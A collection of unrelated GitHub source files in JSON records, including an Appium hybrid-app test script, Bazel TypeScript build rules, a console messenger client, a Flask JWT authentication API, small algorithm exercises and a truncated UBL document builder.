+{"seq_id":"5305531917","text":"\"\"\"\n======================\nAuthor: 柠檬班-小简\nTime: 2020/9/18 19:34\nProject: py30-app\nCompany: 湖南零檬信息技术有限公司\n======================\n\"\"\"\n\"\"\"\n混合应用:原生控件(xml) + html\n识别原生控件:app定位工具\nhtml识别:浏览器的F12\n\n打开手机上 开发者选项 - 边界布局。如果是原生控件,都会框起来。\n\nandroid.webkit.WebView: 里面放的就是html\n\n1、识别html\n 并且你要从原生控件的操作,切换到html的操作。\n\n2、开启webview的调试模式。\n http://testingpai.com/article/1595507219486\n\n3、得到当前所有的contexts。 driver.contexts\n\n4、切换:driver.switch_to.context。 一定会有NATIVE_APP, 可能还会有webview\n\n================ html - web自动化 =================\n5、元素识别工具:\n 元素定位怎么看? -- uc-devtools\n\n6、驱动程序:chromedriver/安卓系统的webview版本\n 版本怎么看?\n 怎么得到手机的webview版本:\n 1、工具:uc-devtools https://dev.ucweb.com/docs/pwa/docs-zh/xy3whu\n 进入到html里面,然后在包名后面的括号里,有webview的版本号。\n 2、chrome浏览器里输入:chrome://inspect\n 3、appium server的日志显示。\n [2020-09-18 09:03:44][Chromedriver] Webview version: 'Chrome/68.0.3440.70'\n \n 在启动参数里,指定chromedriver获取路径:\n \"chromedriverExecutableDir\":\"D:\\ChromeDrivers\\chrome67-69\"\n\n\"\"\"\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep\n\n# 在andriod 7.1.2 上面打开柠檬班app\ndesired_caps = {\n \"automationName\": \"UiAutomator2\",\n \"platformName\": \"Android\",\n \"platformVersion\": \"7.1.2\",\n \"deviceName\": \"huawei\",\n \"appPackage\":\"com.lemon.lemonban\",\n \"appActivity\":\"com.lemon.lemonban.activity.WelcomeActivity\",\n \"noReset\":True,\n \"chromedriverExecutableDir\":\"D:\\ChromeDrivers\\chrome67-69\"\n}\n\n# 跟appium建立连接,然后再把启动参数发过去。\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_caps)\n\n\n# 选择柠檬社区\nloc = (MobileBy.ANDROID_UIAUTOMATOR,'text(\"柠檬社区\")')\nWebDriverWait(driver,30).until(EC.visibility_of_element_located(loc))\n\n# 获取所有的context\ncons = driver.contexts\nprint(\"在进入混合页面之前,所有的上下文:\",cons)\n\ndriver.find_element(*loc).click()\n\n# 等待webview可见。\nloc = (MobileBy.CLASS_NAME,'android.webkit.WebView')\nWebDriverWait(driver,30).until(EC.visibility_of_element_located(loc))\nsleep(1)\n\n# 获取所有的context\ncons = driver.contexts\nprint(\"所有的上下文:\",cons)\n\n# # 切换\ndriver.switch_to.context('WEBVIEW_com.lemon.lemonban')\n\n# ========== html自动化 ======== chromedriver驱动程序是否与webview版本匹配? ===========\n\nloc = (MobileBy.XPATH, '//h2//a[contains(text(),\"2020 最新柠檬班交友群来了!\")]')\nWebDriverWait(driver,30).until(EC.visibility_of_element_located(loc))\ndriver.find_element(*loc).click()","repo_name":"zmh19941223/test_lenmon30","sub_path":"4-app自动化测试/py30_20200918_h5混合应用自动化+微信小程序自动化/day5/H5混合应用自动化.py","file_name":"H5混合应用自动化.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1095899886","text":"load(\n \"@com_vistarmedia_rules_js//js/private:rules.bzl\",\n \"compile_deps\",\n \"js_lib_attr\",\n \"node_attr\",\n \"runtime_deps\",\n)\nload(\"//ts/private:flags.bzl\", \"tsc_attrs\", \"tsc_flags\")\n\nts_src_type = [\".ts\", \".tsx\", \".srcjar\"]\nts_def_type = [\".d.ts\"]\n\ndef _transitive_ts_defs(ctx):\n return depset(\n order = \"postorder\",\n direct = ctx.files.ts_defs,\n transitive = [getattr(dep, \"ts_defs\", depset()) for dep in ctx.attr.deps],\n )\n\ndef _plugin_path(plugin):\n return plugin.label.package\n\ndef _compile(ctx, srcs):\n bin_dir = ctx.configuration.bin_dir.path\n ts_defs = _transitive_ts_defs(ctx)\n outputs = []\n\n output_jsar_format = ctx.attr.output_format == \"jsar\"\n output_src_format = not output_jsar_format\n declaration = ctx.attr.declaration\n\n lib = depset(transitive = [\n compile_deps(ctx.attr.deps),\n runtime_deps(ctx.attr.transform_before + ctx.attr.transform_after),\n runtime_deps([ctx.attr._tslib, ctx.attr._typescript]),\n ])\n\n # For each input file, expect it to create a corresponding .js and .d.ts\n # file. If the source is a .d.ts file, pass it to the parser, but don't\n # expect an output file\n for src in srcs:\n basename = src.basename\n\n name = basename[:basename.rfind(\".\")]\n js_src = name + \".js\"\n if output_src_format:\n outputs.append(ctx.actions.declare_file(js_src, sibling = src))\n\n if declaration and output_src_format:\n ts_def = name + \".d.ts\"\n outputs.append(ctx.actions.declare_file(ts_def, sibling = src))\n\n if output_jsar_format:\n jsar_output = ctx.actions.declare_file(ctx.label.name + \".jsar\")\n outputs.append(jsar_output)\n jsar_name = jsar_output.path\n\n # We will either be building source files (relative to '.'), or generated\n # files (relative to the bazel-bin directory). Since it's not possible to\n # construct a typescript declaration which mixed the two files, we will assume\n # our source files are relative to '/' unless the first file starts with the\n # bazel-bin directory, then use that as the source root.\n #\n # When tsc tries to infer the source root directory, it will take the longest\n # prefix shared by all source files, which is almost always the path to the\n # module where tsc as been invoked. It likely works well for\n # compile-everything-at-once projects, but would put everything at the top\n # level in a scheme that compiles each module independently.\n src_root = \"/\"\n if srcs and srcs[0].path.startswith(bin_dir):\n src_root = bin_dir + \"/\"\n\n tsc_args = ctx.actions.args()\n tsc_args.add(\"--rootDir\", \"/\")\n tsc_args.add(\"--outDir\", bin_dir if output_src_format else \"/\")\n\n if declaration:\n tsc_args.add(\"--declaration\")\n\n tsc_flags(tsc_args, ctx.attr)\n tsc_args.add_all(ts_defs)\n tsc_args.add_all(srcs)\n\n tsc_args_file = ctx.actions.declare_file(ctx.label.name + \".tsc_args\")\n ctx.actions.write(\n output = tsc_args_file,\n content = tsc_args,\n )\n\n libs = ctx.actions.args().add_all(lib)\n lib_paths_file = ctx.actions.declare_file(ctx.label.name + \".lib_paths\")\n ctx.actions.write(\n output = lib_paths_file,\n content = libs,\n )\n\n # Provides the compiler a set of strict (non-transitive) dependencies for this\n # target. Maps each label to its jsar\n deps = [[str(dep.label), dep.cjsar.path] for dep in ctx.attr.deps]\n\n tsc_opts = struct(\n label = str(ctx.label),\n args_file = tsc_args_file.path,\n lib_file = lib_paths_file.path,\n deps = deps,\n src_root = src_root,\n package = ctx.attr.package or ctx.label.package,\n strict_deps = ctx.attr.strict_deps,\n ignored_strict_deps = [str(d.label) for d in ctx.attr.ignored_strict_deps],\n transformers = struct(\n before = [_plugin_path(t) for t in ctx.attr.transform_before],\n after = [_plugin_path(t) for t in ctx.attr.transform_after],\n ),\n output_jsar = jsar_name if output_jsar_format else None,\n )\n\n flag_file = ctx.actions.declare_file(ctx.label.name + \".args\")\n ctx.actions.write(\n output = flag_file,\n content = tsc_opts.to_json(),\n )\n\n inputs = depset(\n direct = srcs + [flag_file, tsc_args_file, lib_paths_file],\n transitive = [lib, ts_defs],\n )\n\n ctx.actions.run(\n executable = ctx.executable._tsc,\n arguments = [\"--flagfile=\" + flag_file.path],\n inputs = inputs,\n tools = [ctx.executable._node],\n outputs = outputs,\n mnemonic = \"CompileTS\",\n execution_requirements = {\"supports-workers\": \"1\"},\n )\n\n if output_jsar_format:\n return struct(\n files = depset([jsar_output]),\n jsar = jsar_output,\n cjsar = jsar_output,\n runtime_deps = runtime_deps(ctx.attr.deps),\n compile_deps = compile_deps(ctx.attr.deps),\n )\n else:\n runfiles = ctx.runfiles(collect_default = True)\n return struct(\n files = depset(outputs),\n ts_defs = ts_defs,\n runfiles = runfiles,\n )\n\ndef _ts_srcs_impl(ctx):\n return _compile(ctx, ctx.files.srcs)\n\ndef _ts_src_impl(ctx):\n return _compile(ctx, ctx.files.src)\n\ndef _tsc_config_impl(ctx):\n return struct(tsc_flags = ctx.attr)\n\nattrs = dict(tsc_attrs.items() + {\n \"ts_defs\": attr.label_list(allow_files = ts_def_type),\n \"deps\": js_lib_attr,\n \"transform_before\": js_lib_attr,\n \"transform_after\": js_lib_attr,\n \"tsc_config\": attr.label(mandatory = False, providers = [\"tsc_flags\"]),\n \"strict_deps\": attr.bool(default = False, doc = \"Enable strict deps -- unsued \" +\n \"dependencies and transitive imports will fail the target.\"),\n \"ignored_strict_deps\": attr.label_list(default = [], doc = \"Dependencies \" +\n \"which should not be checked for strictness\"),\n \"output_format\": attr.string(\n default = \"source\",\n values = [\"source\", \"jsar\"],\n doc = \"Determines if the output will be a source files as a js_library \" +\n \"or a packaged jsar. The default is source, as its far easier to \" +\n \"debug despite a slight increase in compilation time. Note that \" +\n \"in situations where the output files of a ts_src compilation \" +\n \"cannot be known at analyze time, this can be a handy escape \" +\n \"hatch\",\n ),\n \"package\": attr.string(\n doc = \"Optionally rewrite the package the source gets compiled to. See \" +\n \"rules_js for more information\",\n ),\n \"_node\": node_attr,\n \"_tsc\": attr.label(\n default = Label(\"@io_bazel_rules_ts//ts/toolchain:tsc\"),\n executable = True,\n cfg = \"host\",\n ),\n \"_tslib\": attr.label(default = Label(\"@tslib//:lib\")),\n \"_typescript\": attr.label(default = Label(\"@typescript//:lib\")),\n}.items())\n\nts_srcs = rule(\n _ts_srcs_impl,\n attrs = dict(attrs.items() + {\n \"srcs\": attr.label_list(allow_files = ts_src_type),\n \"declaration\": attr.bool(default = True),\n }.items()),\n)\n\nts_src = rule(\n _ts_src_impl,\n attrs = dict(attrs.items() + {\n \"src\": attr.label(allow_single_file = ts_src_type),\n \"declaration\": attr.bool(default = False),\n }.items()),\n)\n\ntsc_config = rule(_tsc_config_impl, attrs = tsc_attrs)\n","repo_name":"vistarmedia/rules_ts","sub_path":"ts/private/rules.bzl","file_name":"rules.bzl","file_ext":"bzl","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"27974952853","text":"import sys\nfrom decorator import Log, LOGGER\nsys.path.append('../')\n\n\nclass ClientCLI:\n def __init(self, transport):\n self.transport = transport\n self.db_session = transport.database.create_session()\n\n # Поток отправки и взаимодействия с пользователем\n def sender_func(self):\n try:\n while True:\n self.print_help()\n while True:\n command = input('Введите команду: ')\n # Если отправка сообщения - соответствующий метод\n if command == 'message':\n self.sender_message(my_cl)\n\n # Вывод помощи\n elif command == 'help':\n self.print_help()\n\n # Выход. Отправляем сообщение серверу о выходе.\n elif command == 'exit':\n try:\n self.transport.stop()\n except:\n pass\n print('Спасибо за использование нашего сервиса!')\n LOGGER.info('Завершение работы по команде пользователя.')\n # Задержка неоходима, чтобы успело уйти сообщение о выходе\n time.sleep(0.5)\n sys.exit(0)\n\n # Список контактов\n elif command == 'contacts':\n contacts_list = self.db_session.get_contacts()\n for contact in contacts_list:\n print(contact)\n\n # Редактирование контактов\n elif command == 'edit':\n self.edit_contacts()\n\n # история сообщений.\n elif command == 'history':\n self.print_history()\n\n else:\n print('Команда не распознана, попробойте снова. help - вывести поддерживаемые команды.')\n\n except (ConnectionResetError, ConnectionError, ConnectionAbortedError):\n LOGGER.error(f'Соединение с сервером {self.transport.server_address} было потеряно.')\n sys.exit(1)\n\n # Функция выводящяя справку по использованию.\n def print_help(self):\n print('Поддерживаемые команды:')\n print('message - отправить сообщение. Кому и текст будет запрошены отдельно.')\n print('history - история сообщений')\n print('contacts - список контактов')\n print('edit - редактирование списка контактов')\n print('help - вывести подсказки по командам')\n print('exit - выход из программы')\n\n # Функция выводящяя историю сообщений\n def print_history(self):\n ask = input('Показать входящие сообщения - in, исходящие - out, все - просто Enter: ')\n #with database_lock:\n if ask == 'in':\n history_list = self.db_session.get_history(to_who=self.transport.client_name)\n for message in history_list:\n print(f'\\nСообщение от пользователя: {message[0]} от {message[3]}:\\n{message[2]}')\n elif ask == 'out':\n history_list = self.db_session.get_history(from_who=self.transport.client_name)\n for message in history_list:\n print(f'\\nСообщение пользователю: {message[1]} от {message[3]}:\\n{message[2]}')\n else:\n history_list = self.db_session.get_history()\n for message in history_list:\n print(f'\\nСообщение от пользователя: {message[0]}, пользователю {message[1]} от {message[3]}\\n{message[2]}')\n\n # Функция изменеия контактов\n def edit_contacts(self):\n ans = input('Для удаления введите del, для добавления add: ')\n if ans == 'del':\n edit = input('Введите имя удаляемного контакта: ')\n if self.db_session.check_contact(edit):\n self.db_session.del_contact(edit)\n else:\n LOGGER.error('Попытка удаления несуществующего контакта.')\n elif ans == 'add':\n # Проверка на возможность такого контакта\n edit = input('Введите имя создаваемого контакта: ')\n if self.db_session.check_user(edit):\n self.db_session.add_contact(edit)\n with self.transport.lock:\n try:\n self.transport.add_contact(edit)\n print('Удачное создание контакта.')\n except RuntimeError:\n LOGGER.error('Не удалось отправить информацию на сервер.')\n\n def sender_message(self):\n dest = input('Введите имя получателя или \\'!!!\\' для завершения работы: ')\n if dest == '!!!':\n return\n # Проверим, что получатель существует\n if not self.db_session.check_user(dest):\n LOGGER.error(f'Попытка отправить сообщение незарегистрированому получателю: {dest}')\n return\n message = input('Введите сообщение для отправки или \\'!!!\\' для завершени�� работы: ')\n if message == '!!!':\n return\n self.transport.send_message(message, dest)","repo_name":"TatianaGrishechkina/python_DBPyQT","sub_path":"Lesson_5_Grishechkina/client_part/client_cli.py","file_name":"client_cli.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39584656445","text":"import datetime\r\nimport traceback\r\nfrom werkzeug.security import safe_str_cmp\r\nfrom flask_restful import Resource, reqparse\r\nfrom flask import request, make_response, render_template\r\nfrom flask_jwt_extended import (\r\n create_access_token,\r\n create_refresh_token,\r\n get_jwt_identity,\r\n jwt_refresh_token_required,\r\n jwt_required,\r\n get_raw_jwt,\r\n fresh_jwt_required,\r\n)\r\n\r\nfrom marshmallow import ValidationError\r\nfrom models.user import UserModel\r\nfrom models.confirmation import ConfirmationModel\r\nfrom blacklist import BLACKLIST\r\n\r\nfrom schemas.user import UserSchema\r\nfrom libs.mailgun import MailGunException\r\nfrom libs.strings import gettext\r\n\r\nuser_schema = UserSchema()\r\n\r\n\r\nclass UserRegister(Resource):\r\n @classmethod\r\n def post(cls):\r\n user_json = request.get_json()\r\n user = user_schema.load(user_json)\r\n\r\n if UserModel.find_by_username(user[\"username\"]):\r\n return {\"message\": gettext(\"user_username_exists\")}, 400\r\n\r\n if UserModel.find_by_email(user[\"email\"]):\r\n return {\"message\": gettext(\"user_email_exists\")}, 400\r\n user = UserModel(**user)\r\n\r\n try:\r\n user.save_to_db()\r\n confirmation = ConfirmationModel(user.id)\r\n confirmation.save_to_db()\r\n user.send_confirmation_email()\r\n return {\"message\": gettext(\"user_registered\")}, 201\r\n except MailGunException as e:\r\n user.delete_from_db() # rollback\r\n return {\"message\": str(e)}, 500\r\n except: # failed to save user to db\r\n traceback.print_exc()\r\n user.delete_from_db() # rollback\r\n return {\"message\": gettext(\"user_error_creating\")}, 500\r\n\r\n\r\nclass User(Resource):\r\n\r\n @classmethod\r\n def get(cls, user_id):\r\n user = UserModel.find_by_id(user_id)\r\n\r\n if not user:\r\n return {\"message\": gettext(\"user_not_found\")}, 404\r\n\r\n return user_schema.dump(user), 200\r\n\r\n @classmethod\r\n def delete(cls, user_id):\r\n user = UserModel.find_by_id(user_id)\r\n if not user:\r\n return {\"message\": gettext(\"user_not_found\")}, 404\r\n\r\n user.delete_from_db()\r\n\r\n return {\"message\": gettext(\"user_deleted\")}, 200\r\n\r\n\r\nclass UserLogin(Resource):\r\n\r\n @classmethod\r\n def post(cls):\r\n try:\r\n user_data = user_schema.load(request.get_json(), partial=(\"email\",))\r\n except ValidationError as err:\r\n return err.messages, 400\r\n\r\n user = UserModel.find_by_username(user_data['username'])\r\n\r\n if user and safe_str_cmp(user.password, user_data['password']):\r\n confirmation = user.most_recent_confirmation\r\n if confirmation and confirmation.confirmed:\r\n expires = datetime.timedelta(seconds=3600)\r\n access_token = create_access_token(\r\n identity=user.id, expires_delta=expires, fresh=True\r\n )\r\n refresh_token = create_refresh_token(user.id)\r\n return {\"access_token\": access_token, \"refresh_token\": refresh_token}, 200\r\n return {'message': gettext(\"user_not_confirmed\").format(user.email)}, 400\r\n\r\n return {\"message\": gettext(\"user_invalid_credentials\")}, 401\r\n\r\n\r\nclass UserLogout(Resource):\r\n @jwt_required\r\n def post(self):\r\n jti = get_raw_jwt()[\"jti\"] # jti is \"JWT ID\", a unique identifier for a JWT.\r\n user_id = get_jwt_identity()\r\n BLACKLIST.add(jti)\r\n return {\"message\": gettext(\"user_logged_out\").format(user_id)}, 200\r\n\r\n\r\nclass TokenRefresh(Resource):\r\n @jwt_refresh_token_required\r\n def post(self):\r\n current_user = get_jwt_identity()\r\n expires = datetime.timedelta(seconds=3600)\r\n new_token = create_access_token(\r\n identity=current_user, expires_delta=expires, fresh=False\r\n )\r\n return {\"access_token\": new_token}, 200\r\n\r\n\r\nclass SetPassword(Resource):\r\n @classmethod\r\n @fresh_jwt_required\r\n def post(cls):\r\n user_json = request.get_json()\r\n user_data = user_schema.load(user_json)\r\n user = UserModel.find_by_username(user_data.username)\r\n\r\n if not user:\r\n return {\"message\": gettext(\"user_not_found\")}, 400\r\n\r\n user.password = user_data.password\r\n user.save_to_db()\r\n\r\n return {\"message\": gettext(\"user_password_updated\")}, 201\r\n\r\n\r\n# class UserConfirm(Resource):\r\n#\r\n# @classmethod\r\n# def get(cls, user_id: id):\r\n# user = UserModel.find_by_id(user_id)\r\n# if not user:\r\n# return {\"message\": USER_NOT_FOUND}, 404\r\n# user.activated = True\r\n# user.save_to_db()\r\n# headers = {\"Content-Type\": \"text/html\"}\r\n# return make_response(render_template(\"confirmation_page.html\", email=user.username), 200, headers)\r\n","repo_name":"saikatbhuiyan/flask-store-api","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"37908512067","text":"\nimport numpy as np\n\nfrom astropy.io import fits\n\ndef find_nearest(times, index_times) :\n \n indices = []\n for time in index_times :\n index = (np.abs(times - time)).argmin()\n indices.append(index)\n \n return indices\n\ndef open_cutout(infile, shape=False, simple=False) :\n \n with fits.open(infile) as hdu :\n if simple :\n data = hdu[0].data\n shape = data.shape\n else :\n data = hdu[0].data\n shape = data.shape\n hdr = hdu[0].header\n redshift = hdr['Z']\n exptime = hdr['EXPTIME']\n area = hdr['AREA']\n photfnu = hdr['PHOTFNU']\n scale = hdr['SCALE']\n \n if simple :\n return data, shape\n else :\n return data, shape, redshift, exptime, area, photfnu, scale\n","repo_name":"camlawlorforsyth/CASTOR","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16067778067","text":"'''\nGiven an n x n matrix and a number x, find the position of x in the matrix if it is present in it. \nOtherwise, print “Not Found”. In the given matrix, every row and column is sorted in increasing order. \nThe designed algorithm should have linear time complexity. \n\nExample: \n\nInput: mat[4][4] = { {10, 20, 30, 40},\n {15, 25, 35, 45},\n {27, 29, 37, 48},\n {32, 33, 39, 50}};\n x = 29\nOutput: Found at (2, 1)\nExplanation: Element at (2,1) is 29\n\nInput : mat[4][4] = { {10, 20, 30, 40},\n {15, 25, 35, 45},\n {27, 29, 37, 48},\n {32, 33, 39, 50}};\n x = 100\nOutput : Element not found\nExplanation: Element 100 is not found\n'''\ndef search(M, x):\n R, C = len(M), len(M[0])\n i, j = 0, C - 1\n while j >= 0 and i < R:\n if M[i][j] == x:\n return (i, j)\n elif M[i][j] < x:\n i += 1\n else:\n j -= 1\n return (-1, -1)\n\nmat = [[10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 50]]\n\nprint(search(mat, 34))","repo_name":"embydextrous/Interview","sub_path":"matrix/27-searchInRowWiseAndColumnWiseSortedMatris.py","file_name":"27-searchInRowWiseAndColumnWiseSortedMatris.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"23619468868","text":"from api.data.base import BaseQuery\n\nclass TestQuery(BaseQuery):\n TABLE_NAME = 'test_table'\n def __init__(self, db_instance):\n super().__init__(db_instance, self.TABLE_NAME)\n\n def test_query(self):\n query = '''\n SELECT\n *\n FROM\n test_table;\n '''\n \n self.execute(query)\n return self.fetch()\n","repo_name":"RKelley1/Twitter-Weather-Map","sub_path":"api/data/not_a_test.py","file_name":"not_a_test.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30904758282","text":"#Number Guessing Game Objectives:\n\n# Include an ASCII art logo.\n# Allow the player to submit a guess for a number between 1 and 100.\n# Check user's guess against actual answer. Print \"Too high.\" or \"Too low.\" depending on the user's answer. \n# If they got the answer correct, show the actual answer to the player.\n# Track the number of turns remaining.\n# If they run out of turns, provide feedback to the player. \n# Include two different difficulty levels (e.g., 10 guesses in easy mode, only 5 guesses in hard mode).\nimport random\n\nprint(\"Welcome to the guessing game!\")\ndifficultyLevel = input(\"Would you like easy or hard mode? \")\ndifficultyLevel = difficultyLevel.lower()\nif(difficultyLevel == \"easy\"):\n lives = 10\nelif(difficultyLevel == \"hard\"):\n lives = 5\n\nnumber = random.randint(1, 100)\ncorrect = False\n\nprint(\"Choose a number between 1 and 100\")\n\nwhile lives >= 0 and correct == False:\n print(f\"You currently have {lives} lives left.\\n\")\n guess = int(input(\"What is your guess? \"))\n if(guess > number):\n print(\"Your guess was too high.\")\n lives -= 1\n elif(guess < number):\n print(\"Your guess was too low.\")\n lives -= 1\n elif(guess == number):\n print(\"Your guess was correct! You win!\")\n correct = True\n elif(lives == 0):\n print(\"You are out of lives. You loose!\")\n ","repo_name":"NoahThomlison/100-days-of-python","sub_path":"day-12/guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"26633522487","text":"from math import sin, cos, radians\n\nfrom collections import namedtuple\n\n# N\n# W + E\n# S\n\n\ndef rotate(d, theta):\n x, y = d\n st = sin(radians(theta))\n ct = cos(radians(theta))\n\n return (\n x * ct - y * st,\n x * st + y * ct\n )\n\n\ndef add(a, b):\n return (a[0] + b[0], a[1] + b[1])\n\n\ndef sub(a, b):\n return (a[0] - b[0], a[1] - b[1])\n\n\ndef muls(a, scalar):\n return (a[0] * scalar, a[1] * scalar)\n\n\ndef rotate_around(point, around, theta):\n translated = sub(point, around)\n\n rotated = rotate(translated, theta)\n\n return add(rotated, around)\n\n\ndef parse_step(line):\n return (line[0], int(line[1:]))\n\n\nState = namedtuple(\"State\", \"pos direction\")\n\nDIRECTIONS = {\n \"N\": (0, 1),\n \"S\": (0, -1),\n \"E\": (1, 0),\n \"W\": (-1, 0)\n}\n\n\ndef step(state, step):\n typ, amount = step\n\n if typ in DIRECTIONS:\n return State(add(state.pos, muls(DIRECTIONS[typ], amount)), state.direction)\n\n if typ == \"F\":\n return State(add(state.pos, muls(state.direction, amount)), state.direction)\n\n rot_dir = 1 if typ == \"L\" else -1\n\n return State(state.pos, rotate(state.direction, amount * rot_dir))\n\n\ndef step_with_waypoint(state, step):\n typ, amount = step\n\n if typ in DIRECTIONS:\n return State(state.pos, add(state.direction, muls(DIRECTIONS[typ], amount)))\n\n if typ == \"F\":\n return State(add(state.pos, muls(state.direction, amount)), state.direction)\n\n rot_dir = 1 if typ == \"L\" else -1\n\n return State(state.pos, rotate(state.direction, amount * rot_dir))\n\n\nINPUT = \"input.txt\"\n\nwith open(INPUT, \"r\") as f:\n STEPS = [parse_step(line.strip()) for line in f.readlines()]\n\n\ncur = State((0, 0), (1, 0))\n\nfor s in STEPS:\n cur = step(cur, s)\n print(cur)\n\npos = cur.pos\n\nprint(abs(pos[0])+abs(pos[1]))\n\n\ncur = State((0, 0), (10, 1))\n\n\nfor s in STEPS:\n cur = step_with_waypoint(cur, s)\n print(cur)\n\npos = cur.pos\n\nprint(abs(pos[0])+abs(pos[1]))\n","repo_name":"a-ungurianu/advent-of-code-2020","sub_path":"day-12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43214900212","text":"from decimal import Decimal\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Address\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Contact\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Country\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import EstimatedArrivalTransportEvent\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import PartyIdentification\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import PartyName\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Period\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import RailTransport\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import ReceiverParty\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import SenderParty\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import SourceIssuerParty\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import StatusLocation\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import TransportMeans\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import TransportProgressStatusRequestDocumentReference\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import TransportSchedule\nfrom ubl.models.common.ubl_common_basic_components_2_1 import CityName\nfrom ubl.models.common.ubl_common_basic_components_2_1 import ElectronicMail\nfrom ubl.models.common.ubl_common_basic_components_2_1 import Id\nfrom ubl.models.common.ubl_common_basic_components_2_1 import IdentificationCode\nfrom ubl.models.common.ubl_common_basic_components_2_1 import JourneyId\nfrom ubl.models.common.ubl_common_basic_components_2_1 import LocationTypeCode\nfrom ubl.models.common.ubl_common_basic_components_2_1 import Name\nfrom ubl.models.common.ubl_common_basic_components_2_1 import RegistrationNationalityId\nfrom ubl.models.common.ubl_common_basic_components_2_1 import ReliabilityPercent\nfrom ubl.models.common.ubl_common_basic_components_2_1 import SequenceNumeric\nfrom ubl.models.common.ubl_common_basic_components_2_1 import StreetName\nfrom ubl.models.common.ubl_common_basic_components_2_1 import Telephone\nfrom ubl.models.common.ubl_common_basic_components_2_1 import TrainId\nfrom ubl.models.common.ubl_common_basic_components_2_1 import TransportMeansTypeCode\nfrom ubl.models.common.ubl_common_basic_components_2_1 import UblversionId\nfrom ubl.models.maindoc.ubl_transport_progress_status_2_1 import TransportProgressStatus\nfrom xsdata.models.datatype import XmlDate\nfrom xsdata.models.datatype import XmlTime\n\n\nobj = TransportProgressStatus(\n ublversion_id=UblversionId(\n value=\"2.1\"\n ),\n id=Id(\n value=\"TPSR_1\"\n ),\n issue_date=XmlDate(2011, 10, 3),\n issue_time=XmlTime(14, 30, 10, 0, 60),\n status_available_indicator=True,\n sender_party=SenderParty(\n party_identification=[\n PartyIdentification(\n id=Id(\n value=\"4058673821325\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n )\n ),\n ],\n party_name=[\n PartyName(\n name=Name(\n value=\"ARRIVA\"\n )\n ),\n ],\n contact=Contact(\n name=Name(\n value=\"SomeName\"\n ),\n telephone=Telephone(\n value=\"+49450557888\"\n ),\n electronic_mail=ElectronicMail(\n value=\"SomeName@arriva.de\"\n )\n )\n ),\n receiver_party=ReceiverParty(\n party_identification=[\n PartyIdentification(\n id=Id(\n value=\"4058673827641\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n )\n ),\n ],\n party_name=[\n PartyName(\n name=Name(\n value=\"NECOSS\"\n )\n ),\n ],\n contact=Contact(\n name=Name(\n value=\"SomeName\"\n ),\n telephone=Telephone(\n value=\"+49450557000\"\n ),\n electronic_mail=ElectronicMail(\n value=\"SomeName@necoss.de\"\n )\n )\n ),\n source_issuer_party=SourceIssuerParty(\n party_identification=[\n PartyIdentification(\n id=Id(\n value=\"4058673821325\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n )\n ),\n ],\n party_name=[\n PartyName(\n name=Name(\n value=\"ARRIVA\"\n )\n ),\n ],\n contact=Contact(\n name=Name(\n value=\"SomeName\"\n ),\n telephone=Telephone(\n value=\"+49450557888\"\n ),\n electronic_mail=ElectronicMail(\n value=\"SomeName@arriva.de\"\n )\n )\n ),\n transport_progress_status_request_document_reference=TransportProgressStatusRequestDocumentReference(\n id=Id(\n value=\"TPS_1\",\n scheme_name=\"MovementReferenceNumber\"\n )\n ),\n transport_means=TransportMeans(\n journey_id=JourneyId(\n value=\"RHamBrem\"\n ),\n registration_nationality_id=RegistrationNationalityId(\n value=\"DE\"\n ),\n transport_means_type_code=TransportMeansTypeCode(\n value=\"230\"\n ),\n rail_transport=RailTransport(\n train_id=TrainId(\n value=\"RID01235\"\n )\n )\n ),\n transport_schedule=[\n TransportSchedule(\n sequence_numeric=SequenceNumeric(\n value=Decimal(\"1\")\n ),\n reliability_percent=ReliabilityPercent(\n value=Decimal(\"80\")\n ),\n status_location=StatusLocation(\n location_type_code=LocationTypeCode(\n value=\"13\"\n ),\n address=Address(\n id=Id(\n value=\"4568763527610\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n ),\n 